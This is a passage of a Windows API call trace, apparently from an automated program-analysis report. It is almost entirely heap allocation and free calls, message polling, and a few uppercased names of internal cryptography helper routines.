(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0234.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0234.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0234.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0234.958] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d78 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0234.959] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.959] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0234.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.960] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0234.960] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0234.960] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0234.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0234.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0234.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.960] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.961] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.961] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.962] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0234.962] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0234.962] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0234.962] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0234.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0234.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0234.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0234.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.964] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0234.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.965] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0234.965] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.965] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0234.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0234.966] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 